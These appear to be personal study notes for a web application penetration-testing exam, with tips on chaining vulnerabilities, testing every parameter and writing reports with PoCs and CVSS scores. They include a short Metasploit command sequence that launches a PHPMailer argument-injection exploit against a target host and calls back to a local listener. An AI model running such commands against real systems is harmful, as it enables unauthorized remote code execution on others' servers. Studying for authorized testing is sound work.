search phpmailer
use exploit/multi/http/phpmailer_arg_injection
set RHOST
set WEB_ROOT /var/www/html
set LHOST ip
exploit
SWF Investigator
soapexample.com/WS.php?wsdl
Chaining vulns
chained 3 vulnerabilities (A path traversal, An SSRF in an external piece of software, and a post-authentication RCE) into a full pre-auth RCE
The purpose of this assessment and report is to identify any web application issues that could affect ABC application and the web server hosting it, and to provide solutions to remedy these same issues.
Use Graphs, Charts, stats and tables. Text should only be used to explain charts and give final estimation on the state of security.
to have Knowledge about chaining vulnerabilities together - in order to achieve greater impact
test ALL the parameters, the attack point can be in the most unexpected place
Do not forget to include POC, CVSS scoring or Mitigation recommendations in the report
Flash, CORS, and the NoSQL databases are not relevant for the exam. Of those three it's probably still a good idea to invest some time into CORS, and a little of NoSQL databases.